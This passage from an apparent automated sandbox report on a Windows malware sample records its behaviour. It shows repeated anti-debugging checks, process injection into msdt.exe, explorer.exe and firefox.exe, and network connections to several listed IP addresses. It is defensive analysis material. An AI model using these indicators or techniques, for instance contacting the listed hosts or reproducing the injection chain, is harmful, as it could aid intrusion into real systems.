        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D114C9 mov eax, dword ptr fs:[00000030h]2_2_33D114C9
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D114C9 mov eax, dword ptr fs:[00000030h]2_2_33D114C9
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D114C9 mov eax, dword ptr fs:[00000030h]2_2_33D114C9
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D114C9 mov eax, dword ptr fs:[00000030h]2_2_33D114C9
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D114C9 mov eax, dword ptr fs:[00000030h]2_2_33D114C9
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DAF4FD mov eax, dword ptr fs:[00000030h]2_2_33DAF4FD
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D194FA mov eax, dword ptr fs:[00000030h]2_2_33D194FA
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D254E0 mov eax, dword ptr fs:[00000030h]2_2_33D254E0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D2B490 mov eax, dword ptr fs:[00000030h]2_2_33D2B490
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D2B490 mov eax, dword ptr fs:[00000030h]2_2_33D2B490
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D7D4A0 mov ecx, dword ptr fs:[00000030h]2_2_33D7D4A0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D7D4A0 mov eax, dword ptr fs:[00000030h]2_2_33D7D4A0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D7D4A0 mov eax, dword ptr fs:[00000030h]2_2_33D7D4A0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D2D450 mov eax, dword ptr fs:[00000030h]2_2_33D2D450
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D2D450 mov eax, dword ptr fs:[00000030h]2_2_33D2D450
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CFD454 mov eax, dword ptr fs:[00000030h]2_2_33CFD454
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CFD454 mov eax, dword ptr fs:[00000030h]2_2_33CFD454
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CFD454 mov eax, dword ptr fs:[00000030h]2_2_33CFD454
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CFD454 mov eax, dword ptr fs:[00000030h]2_2_33CFD454
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CFD454 mov eax, dword ptr fs:[00000030h]2_2_33CFD454
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CFD454 mov eax, dword ptr fs:[00000030h]2_2_33CFD454
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DAF478 mov eax, dword ptr fs:[00000030h]2_2_33DAF478
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DAF409 mov eax, dword ptr fs:[00000030h]2_2_33DAF409
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DAD430 mov eax, dword ptr fs:[00000030h]2_2_33DAD430
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DAD430 mov eax, dword ptr fs:[00000030h]2_2_33DAD430
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEB420 mov eax, dword ptr fs:[00000030h]2_2_33CEB420
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D27425 mov eax, dword ptr fs:[00000030h]2_2_33D27425
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D27425 mov ecx, dword ptr fs:[00000030h]2_2_33D27425
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D7F42F mov eax, dword ptr fs:[00000030h]2_2_33D7F42F
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D7F42F mov eax, dword ptr fs:[00000030h]2_2_33D7F42F
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D7F42F mov eax, dword ptr fs:[00000030h]2_2_33D7F42F
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D7F42F mov eax, dword ptr fs:[00000030h]2_2_33D7F42F
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D7F42F mov eax, dword ptr fs:[00000030h]2_2_33D7F42F
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D79429 mov eax, dword ptr fs:[00000030h]2_2_33D79429
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1FBC0 mov ecx, dword ptr fs:[00000030h]2_2_33D1FBC0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1FBC0 mov eax, dword ptr fs:[00000030h]2_2_33D1FBC0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1FBC0 mov eax, dword ptr fs:[00000030h]2_2_33D1FBC0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1FBC0 mov eax, dword ptr fs:[00000030h]2_2_33D1FBC0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1FBC0 mov eax, dword ptr fs:[00000030h]2_2_33D1FBC0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D2BBC0 mov eax, dword ptr fs:[00000030h]2_2_33D2BBC0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D2BBC0 mov eax, dword ptr fs:[00000030h]2_2_33D2BBC0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D2BBC0 mov ecx, dword ptr fs:[00000030h]2_2_33D2BBC0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D2BBC0 mov eax, dword ptr fs:[00000030h]2_2_33D2BBC0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D6FBC2 mov eax, dword ptr fs:[00000030h]2_2_33D6FBC2
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D85BC0 mov eax, dword ptr fs:[00000030h]2_2_33D85BC0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D25BE0 mov eax, dword ptr fs:[00000030h]2_2_33D25BE0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D25BE0 mov eax, dword ptr fs:[00000030h]2_2_33D25BE0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D01BE7 mov eax, dword ptr fs:[00000030h]2_2_33D01BE7
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D01BE7 mov eax, dword ptr fs:[00000030h]2_2_33D01BE7
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CE7BF0 mov eax, dword ptr fs:[00000030h]2_2_33CE7BF0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CE7BF0 mov ecx, dword ptr fs:[00000030h]2_2_33CE7BF0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CE7BF0 mov eax, dword ptr fs:[00000030h]2_2_33CE7BF0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CE7BF0 mov eax, dword ptr fs:[00000030h]2_2_33CE7BF0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D71B93 mov eax, dword ptr fs:[00000030h]2_2_33D71B93
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D7DB90 mov eax, dword ptr fs:[00000030h]2_2_33D7DB90
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D21B9C mov eax, dword ptr fs:[00000030h]2_2_33D21B9C
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D01B80 mov eax, dword ptr fs:[00000030h]2_2_33D01B80
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF3BA4 mov eax, dword ptr fs:[00000030h]2_2_33CF3BA4
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF3BA4 mov eax, dword ptr fs:[00000030h]2_2_33CF3BA4
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF3BA4 mov eax, dword ptr fs:[00000030h]2_2_33CF3BA4
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF3BA4 mov eax, dword ptr fs:[00000030h]2_2_33CF3BA4
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D2BB5B mov esi, dword ptr fs:[00000030h]2_2_33D2BB5B
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D7FB45 mov eax, dword ptr fs:[00000030h]2_2_33D7FB45
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DABB40 mov ecx, dword ptr fs:[00000030h]2_2_33DABB40
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DABB40 mov eax, dword ptr fs:[00000030h]2_2_33DABB40
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CE7B7D mov eax, dword ptr fs:[00000030h]2_2_33CE7B7D
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CE7B7D mov ecx, dword ptr fs:[00000030h]2_2_33CE7B7D
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D7DB1B mov eax, dword ptr fs:[00000030h]2_2_33D7DB1B
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D31B0F mov eax, dword ptr fs:[00000030h]2_2_33D31B0F
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D31B0F mov eax, dword ptr fs:[00000030h]2_2_33D31B0F
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D7DB2A mov eax, dword ptr fs:[00000030h]2_2_33D7DB2A
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1DAC0 mov eax, dword ptr fs:[00000030h]2_2_33D1DAC0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1DAC0 mov eax, dword ptr fs:[00000030h]2_2_33D1DAC0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1DAC0 mov eax, dword ptr fs:[00000030h]2_2_33D1DAC0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1DAC0 mov eax, dword ptr fs:[00000030h]2_2_33D1DAC0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1DAC0 mov eax, dword ptr fs:[00000030h]2_2_33D1DAC0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1DAC0 mov eax, dword ptr fs:[00000030h]2_2_33D1DAC0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEFAEC mov edi, dword ptr fs:[00000030h]2_2_33CEFAEC
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D03AF6 mov eax, dword ptr fs:[00000030h]2_2_33D03AF6
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D03AF6 mov eax, dword ptr fs:[00000030h]2_2_33D03AF6
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D03AF6 mov eax, dword ptr fs:[00000030h]2_2_33D03AF6
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D03AF6 mov eax, dword ptr fs:[00000030h]2_2_33D03AF6
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D03AF6 mov eax, dword ptr fs:[00000030h]2_2_33D03AF6
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF9AE4 mov eax, dword ptr fs:[00000030h]2_2_33CF9AE4
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEBA80 mov eax, dword ptr fs:[00000030h]2_2_33CEBA80
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D97ABE mov eax, dword ptr fs:[00000030h]2_2_33D97ABE
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D29ABF mov eax, dword ptr fs:[00000030h]2_2_33D29ABF
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D29ABF mov eax, dword ptr fs:[00000030h]2_2_33D29ABF
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D29ABF mov eax, dword ptr fs:[00000030h]2_2_33D29ABF
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DADAAF mov eax, dword ptr fs:[00000030h]2_2_33DADAAF
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEFA44 mov ecx, dword ptr fs:[00000030h]2_2_33CEFA44
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D7DA40 mov eax, dword ptr fs:[00000030h]2_2_33D7DA40
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D29A48 mov eax, dword ptr fs:[00000030h]2_2_33D29A48
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D29A48 mov eax, dword ptr fs:[00000030h]2_2_33D29A48
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DBBA66 mov eax, dword ptr fs:[00000030h]2_2_33DBBA66
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DBBA66 mov eax, dword ptr fs:[00000030h]2_2_33DBBA66
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DBBA66 mov eax, dword ptr fs:[00000030h]2_2_33DBBA66
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DBBA66 mov eax, dword ptr fs:[00000030h]2_2_33DBBA66
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D7DA31 mov eax, dword ptr fs:[00000030h]2_2_33D7DA31
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DADA30 mov eax, dword ptr fs:[00000030h]2_2_33DADA30
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF1A24 mov eax, dword ptr fs:[00000030h]2_2_33CF1A24
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF1A24 mov eax, dword ptr fs:[00000030h]2_2_33CF1A24
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1DA20 mov eax, dword ptr fs:[00000030h]2_2_33D1DA20
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1DA20 mov eax, dword ptr fs:[00000030h]2_2_33D1DA20
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1DA20 mov eax, dword ptr fs:[00000030h]2_2_33D1DA20
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1DA20 mov eax, dword ptr fs:[00000030h]2_2_33D1DA20
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1DA20 mov eax, dword ptr fs:[00000030h]2_2_33D1DA20
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1DA20 mov edx, dword ptr fs:[00000030h]2_2_33D1DA20
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CE7A30 mov eax, dword ptr fs:[00000030h]2_2_33CE7A30
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CE7A30 mov eax, dword ptr fs:[00000030h]2_2_33CE7A30
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CE7A30 mov eax, dword ptr fs:[00000030h]2_2_33CE7A30
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CFB9C0 mov eax, dword ptr fs:[00000030h]2_2_33CFB9C0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CFB9C0 mov eax, dword ptr fs:[00000030h]2_2_33CFB9C0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D999D6 mov ecx, dword ptr fs:[00000030h]2_2_33D999D6
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D7D9C7 mov eax, dword ptr fs:[00000030h]2_2_33D7D9C7
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DAD9C6 mov eax, dword ptr fs:[00000030h]2_2_33DAD9C6
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1D9CE mov eax, dword ptr fs:[00000030h]2_2_33D1D9CE
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1B9FA mov eax, dword ptr fs:[00000030h]2_2_33D1B9FA
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CE99F0 mov ecx, dword ptr fs:[00000030h]2_2_33CE99F0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D7F9AA mov eax, dword ptr fs:[00000030h]2_2_33D7F9AA
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D7F9AA mov eax, dword ptr fs:[00000030h]2_2_33D7F9AA
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEB9B0 mov eax, dword ptr fs:[00000030h]2_2_33CEB9B0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D7395B mov eax, dword ptr fs:[00000030h]2_2_33D7395B
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D7395B mov eax, dword ptr fs:[00000030h]2_2_33D7395B
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D7395B mov eax, dword ptr fs:[00000030h]2_2_33D7395B
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1D940 mov eax, dword ptr fs:[00000030h]2_2_33D1D940
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1D940 mov eax, dword ptr fs:[00000030h]2_2_33D1D940
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DBD946 mov eax, dword ptr fs:[00000030h]2_2_33DBD946
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DAD947 mov eax, dword ptr fs:[00000030h]2_2_33DAD947
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CFB950 mov eax, dword ptr fs:[00000030h]2_2_33CFB950
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CFB950 mov ecx, dword ptr fs:[00000030h]2_2_33CFB950
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CFB950 mov eax, dword ptr fs:[00000030h]2_2_33CFB950
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CFB950 mov eax, dword ptr fs:[00000030h]2_2_33CFB950
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CFB950 mov eax, dword ptr fs:[00000030h]2_2_33CFB950
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CFB950 mov eax, dword ptr fs:[00000030h]2_2_33CFB950
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CE7917 mov eax, dword ptr fs:[00000030h]2_2_33CE7917
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D85930 mov eax, dword ptr fs:[00000030h]2_2_33D85930
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D85930 mov eax, dword ptr fs:[00000030h]2_2_33D85930
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D85930 mov eax, dword ptr fs:[00000030h]2_2_33D85930
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D85930 mov ecx, dword ptr fs:[00000030h]2_2_33D85930
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D19938 mov ecx, dword ptr fs:[00000030h]2_2_33D19938
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D25921 mov eax, dword ptr fs:[00000030h]2_2_33D25921
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D25921 mov ecx, dword ptr fs:[00000030h]2_2_33D25921
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D25921 mov eax, dword ptr fs:[00000030h]2_2_33D25921
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D25921 mov eax, dword ptr fs:[00000030h]2_2_33D25921
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEB931 mov eax, dword ptr fs:[00000030h]2_2_33CEB931
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEB931 mov eax, dword ptr fs:[00000030h]2_2_33CEB931
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DB18DA mov eax, dword ptr fs:[00000030h]2_2_33DB18DA
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DB18DA mov eax, dword ptr fs:[00000030h]2_2_33DB18DA
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DB18DA mov eax, dword ptr fs:[00000030h]2_2_33DB18DA
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DB18DA mov eax, dword ptr fs:[00000030h]2_2_33DB18DA
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF98DE mov eax, dword ptr fs:[00000030h]2_2_33CF98DE
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D9F8F8 mov eax, dword ptr fs:[00000030h]2_2_33D9F8F8
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D9F8F8 mov eax, dword ptr fs:[00000030h]2_2_33D9F8F8
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D9F8F8 mov eax, dword ptr fs:[00000030h]2_2_33D9F8F8
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D9F8F8 mov eax, dword ptr fs:[00000030h]2_2_33D9F8F8
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D9F8F8 mov eax, dword ptr fs:[00000030h]2_2_33D9F8F8
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1D8F0 mov eax, dword ptr fs:[00000030h]2_2_33D1D8F0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1D8F0 mov eax, dword ptr fs:[00000030h]2_2_33D1D8F0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1D8F0 mov esi, dword ptr fs:[00000030h]2_2_33D1D8F0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1D8F0 mov eax, dword ptr fs:[00000030h]2_2_33D1D8F0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1D8F0 mov eax, dword ptr fs:[00000030h]2_2_33D1D8F0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1D8F0 mov eax, dword ptr fs:[00000030h]2_2_33D1D8F0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1D8F0 mov eax, dword ptr fs:[00000030h]2_2_33D1D8F0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1D8F0 mov eax, dword ptr fs:[00000030h]2_2_33D1D8F0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CE78E1 mov eax, dword ptr fs:[00000030h]2_2_33CE78E1
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF58E0 mov eax, dword ptr fs:[00000030h]2_2_33CF58E0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF58E0 mov eax, dword ptr fs:[00000030h]2_2_33CF58E0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF58E0 mov eax, dword ptr fs:[00000030h]2_2_33CF58E0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF58E0 mov eax, dword ptr fs:[00000030h]2_2_33CF58E0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D2B890 mov eax, dword ptr fs:[00000030h]2_2_33D2B890
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D2B890 mov eax, dword ptr fs:[00000030h]2_2_33D2B890
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D2B890 mov eax, dword ptr fs:[00000030h]2_2_33D2B890
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D7B890 mov eax, dword ptr fs:[00000030h]2_2_33D7B890
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D7B890 mov eax, dword ptr fs:[00000030h]2_2_33D7B890
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D7B890 mov ecx, dword ptr fs:[00000030h]2_2_33D7B890
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1D898 mov eax, dword ptr fs:[00000030h]2_2_33D1D898
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 0_2_0040154A PostQuitMessage,LdrInitializeThunk,Sleep,SetForegroundWindow,LdrInitializeThunk,ShowWindow,ShowWindow,ShowWindow,SetFileAttributesA,GetFileAttributesA,SetCurrentDirectoryA,MoveFileA,GetFullPathNameA,GetShortPathNameA,SearchPathA,lstrcatA,CompareFileTime,LdrInitializeThunk,SetFileTime,CloseHandle,lstrcatA,0_2_0040154A

        HIPS / PFW / Operating System Protection Evasion

        barindex
        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\explorer.exeNetwork Connect: 91.189.114.27 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 107.148.17.67 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 104.21.62.30 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 169.150.247.39 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 162.0.239.145 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 96.44.182.131 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 51.79.96.115 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 43.154.67.170 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 119.18.54.51 80Jump to behavior
        Maps a DLL or memory area into another process
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeSection loaded: unknown target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
        Writes to foreign memory regions
        Source: C:\Windows\SysWOW64\msdt.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF6996F0000Jump to behavior
        Injects a PE file into a foreign processes
